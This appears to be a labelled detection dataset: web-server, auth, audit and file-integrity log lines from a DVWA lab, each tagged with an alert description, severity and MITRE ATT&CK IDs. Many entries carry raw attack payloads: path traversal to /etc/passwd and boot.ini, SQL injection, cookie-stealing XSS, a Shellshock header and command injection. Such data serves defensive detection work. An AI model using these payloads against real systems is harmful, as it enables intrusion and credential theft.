192.168.204.1 - - [06/Oct/2023:01:22:38 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%25%5c%2e%2e%25%5c%2e%2e%25%5c%2e%2e%25%5c%2e%2e%25%5c%2e%2e%25%5c%2e%2e%25%5c%2e%2e%25%5c%2e%2e%25%5c%2e%2e%25%5c%2e%2e%25%5c%2e%2e%25%5c%2e%2e%25%5c%2e%2e%25%5c%2e%2e%00&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:25 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%22),NULL,NULL,NULL)%20waitfor%20delay%20'0%3a0%3a20'%20%2f%2a&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
SQL injection attempt.
7
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:29:02 +0500] "GET /DVWA/login.php?Login=Login&password=%0Acat%20/etc/passwd&password=&user_token=8b200124ecd990a2056241cb3415035a&username=871836 HTTP/1.1" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:16:25 +0500] "GET /DVWA/<script>cross_site_scripting.nasl</script>.cfm HTTP/1.1" 404 493 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:40 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%2f%c1%8s%2e%2e%2e%2e%2f%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:28:27 +0500] "GET /DVWA/login.php?Login=Login&password=4kqvfG0t&user_token=8b200124ecd990a2056241cb3415035a&user_token=..../..../..../..../..../..../..../..../etc/passwd&username= HTTP/1.1" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:43 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%u2216%2e%2e%u2216boot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log.1
Dec 23 16:05:38 ubuntu sshd[2885]: Accepted password for arsalan from 192.168.217.1 port 65395 ssh2
sshd: authentication success.
3
["T1078","T1021"]
["TA0005","TA0003","TA0004","TA0001","TA0008"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:26:02 +0500] "GET /cgi-bin/test-cgi HTTP/1.1" 404 494 "-" "() { ignored; }; /bin/sleep 5;"
Shellshock attack attempt
6
["T1068","T1190"]
["TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:16:26 +0500] "GET /search.php?searchfor=\"><script>window.alert(document.cookie);</script> HTTP/1.1" 404 493 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:59 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2f%2e%u2215%2e%2e%2e%2f%2e%u2215%2e%2e%2e%2f%2e%u2215%2e%2e%2e%2f%2e%u2215%2e%2e%2e%2f%2e%u2215%2e%2e%2e%2f%2e%u2215etc%u2215issue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:53 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%2e%2e%5c%2e%2e%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:35 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afetc%c1%afissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fissue%3bindex%2ehtm&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/tmp/go-build2724593589/b010/_pkg_.a' modified Mode: realtime Changed attributes: size,md5,sha1,sha256 Size changed from '241493' to '274261' Old md5sum was: 'ed66f3fbe58f86200f58eb1adfda1dab' New md5sum is : 'd0b48375f014b584220a0dcc7cc36b69' Old sha1sum was: 'e5e36ea01fbf27a69da7965d8da4b83ddefd8421' New sha1sum is : 'e7d2f990f54105a9a897f83ffa8c3c426641326d' Old sha256sum was: '62a90783b2427818c3af72d38add90e52bda7fc2535bdec5aeb18b7e34ea7b39' New sha256sum is : '012f53856e31c527ae93fc77e20a5440baffda010c533080199fa060aecaae41'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:07 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:10 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%00%2e%2f%2e%00%2e%2f%2e%00%2e%2f%2e%00%2e%2f%2e%00%2e%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:46:56 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:44 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%e0%80%afboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:48:10 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:34 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c1%9cetc%c1%9cissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/tmp/read-file569562474/unpack/meta/snap.yaml' deleted Mode: realtime
File deleted.
7
["T1070.004","T1485"]
["TA0005","TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:08 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/tmp/apt.data.Rhq6wk' modified Mode: realtime Changed attributes: size,md5,sha1,sha256 Size changed from '106800' to '109468' Old md5sum was: '02593d20edb4c8a2c003f9376245637d' New md5sum is : 'f10f1940ee1df10a2025f13d13355178' Old sha1sum was: 'bdd0b37310fd1a7e046af60d6d2ef1fcef44e8ec' New sha1sum is : 'd1077997eead5d7b329e04e87613175d85d32582' Old sha256sum was: 'b6c6737d2a233dccd369bb62137408b0570b0aa939e5a5b16d48af4e9d821eb9' New sha256sum is : '9b477be3c990ba1659a71137a0e9bb7c73aa253644a2f4c0b50cc8077d04ee2a'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:14 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%2e%2e%2e%2f%2e%2e%2e%2e%2f%2e%2e%2e%2e%2f%2e%2e%2e%2e%2f%2e%2e%2e%2e%2f%2e%2e%2e%2e%2f&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:32 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025etc%uF025issue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:40 +0500] "GET /forum/forum/include/error/autherror.cfm?errorcode=1&FTVAR_URLP=%22%3e%3cscript%3ealert('fusetalk_mult_xss.nasl')%3c%2fscript%3e HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Multiple XSS (Cross Site Scripting) attempts from same source ip.
10
["T1059"]
["TA0002"]
/var/log/auth.log
Oct 18 23:47:59 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:45 +0500] "GET /pixelpost/index.php?x=browse&category='UNION%20SELECT%20'1'%2c'2'%2c'pixelpost_category_sql_injection.nasl'%2c'1697826343'%2c'5'-- HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
SQL injection attempt.
7
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:16:26 +0500] "GET /forum_2.php?msg=10&return=<script>foo</script> HTTP/1.1" 404 493 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:02 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/audit/audit.log
type=SYSCALL msg=audit(1704468923.667:3015): arch=c000003e syscall=59 success=yes exit=0 a0=555d97b8c7d0 a1=555d97bc1110 a2=555d97bc1030 a3=7ffde43dbb60 items=2 ppid=4016 pid=4061 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="snap-device-hel" exe="/usr/lib/snapd/snap-device-helper" subj=unconfined key="audit-wazuh-c"ARCH=x86_64 SYSCALL=execve AUID="unset" UID="root" GID="root" EUID="root" SUID="root" FSUID="root" EGID="root" SGID="root" FSGID="root" type=BPRM_FCAPS msg=audit(1704468923.667:3015): fver=0 fp=0 fi=0 fe=0 old_pp=000001f7fdffffff old_pi=0 old_pe=000001f7fdffffff old_pa=0 pp=000001f7fdffffff pi=0 pe=000001f7fdffffff pa=0 frootid=0 type=EXECVE msg=audit(1704468923.667:3015): argc=5 a0="/usr/lib/snapd/snap-device-helper" a1="change" a2="snap_snap-store_ubuntu-software-local-file" a3="/devices/pci0000:00/0000:00:0f.0/drm/card0/card0-Virtual-1" a4="0:0" type=CWD msg=audit(1704468923.667:3015): cwd="/" type=PATH msg=audit(1704468923.667:3015): item=0 name="/usr/lib/snapd/snap-device-helper" inode=287412 dev=08:03 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0OUID="root" OGID="root" type=PATH msg=audit(1704468923.667:3015): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=264289 dev=08:03 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0OUID="root" OGID="root" type=PROCTITLE msg=audit(1704468923.667:3015): proctitle=2F7573722F6C69622F736E6170642F736E61702D6465766963652D68656C706572006368616E676500736E61705F736E61702D73746F72655F7562756E74752D736F6674776172652D6C6F63616C2D66696C65002F646576696365732F706369303030303A30302F303030303A30303A30662E302F64726D2F63617264302F63
Discovery System Architecture via file Command
14
["T1083"]
["TA0007"]
syscheck
File '/tmp/go-build2724593589/b119/symabis' deleted Mode: realtime
File deleted.
7
["T1070.004","T1485"]
["TA0005","TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:42 +0500] "GET /cgi-bin/sqwebmail?redirect=%0d%0a%0d%0asqwebmail_http_splitting.nasl HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:23:02 +0500] "GET /DVWA/login.php?user_token=/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini&user_token=8b200124ecd990a2056241cb3415035a HTTP/1.1" 200 1722 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:39 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:23 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
SQL injection attempt.
7
["T1190"]
["TA0001"]
/var/log/auth.log
Dec 24 15:41:00 ubuntu sshd[4257]: Accepted password for arsalan from 192.168.217.1 port 63543 ssh2
sshd: authentication success.
3
["T1078","T1021"]
["TA0005","TA0003","TA0004","TA0001","TA0008"]
syscheck
File '/tmp/go-build2314020258/b046/_pkg_.a' deleted Mode: realtime
File deleted.
7
["T1070.004","T1485"]
["TA0005","TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:36 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:42 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fnginx%2ferror_log&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:16 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%5c%2e%2e%5c%2e%5c%2e%2e%5c%2e%5c%2e%2e%5c%2e%5c%2e%2e%5c%2e%5c%2e%2e%5c%2e%5c%2e%2e%5c%2e%5c%2e%2e%5c%2e%5c%2e%2e%5c&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:39:58 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:04 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%2e%5c%2f%2e%2e%5c%2f%2e%2e%5c%2f%2e%2e%5c%2f%2e%2e%5c%2f%2e%2e%5c%2f%2e%2e%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:38 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cIMG%20STYLE%3d%22xss%3aexpr%2f%2aXSS%2a%2fession(javascript%3aalert(1))%22%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple XSS (Cross Site Scripting) attempts from same source ip.
10
["T1059"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:25 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%22,NULL,NULL,NULL)%20waitfor%20delay%20'0%3a0%3a20'%20%2f%2a&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
SQL injection attempt.
7
["T1190"]
["TA0001"]
syscheck
File '/tmp/go-build2314020258/b096/_pkg_.a' modified Mode: realtime Changed attributes: size,md5,sha1,sha256 Size changed from '1175552' to '1376256' Old md5sum was: '327dcf9e037f9ec9f474a0759698b966' New md5sum is : '6ce1bae37e78596356a8a446b46b625a' Old sha1sum was: 'dcc8fb1298821501c4bd0e1f9f9a8b8b1a5fd7ed' New sha1sum is : 'df2c8d657a67cf300196aaf0640687ee8d6183e9' Old sha256sum was: '66031efc41672da8ea6dc4538d5556febfde10a0d1dd7076cae5a03b1dfae3a5' New sha256sum is : '284364ae727767404bc35235b222948546a12303991f9537248d7dd893dfc026'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
syscheck
File '/tmp/go-build2314020258/b096/_pkg_.a' modified Mode: realtime Changed attributes: size,md5,sha1,sha256 Size changed from '1654784' to '1904916' Old md5sum was: 'a5f955c8dfd821e3510697c5a12a89fb' New md5sum is : '3875ccb3f627a32a9f95f7ec1aa0d6cd' Old sha1sum was: '39e73ff62d2b0de651dbd52c13e7d2b3b09893e2' New sha1sum is : 'b65b1a65d4f5a03759626fdff6dd2d16843bed06' Old sha256sum was: 'e3a15b98feea036f10c723e709e882f8e3ab573b1aaa5fd3e51efd06ba93186b' New sha256sum is : 'b288cce7a7f8d3e760cd11bddcd1ea3febc34dcb10ec4262f5e303532ac21151'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
syscheck
File '/tmp/go-build2724593589/b123/_pkg_.a' deleted Mode: realtime
File deleted.
7
["T1070.004","T1485"]
["TA0005","TA0040"]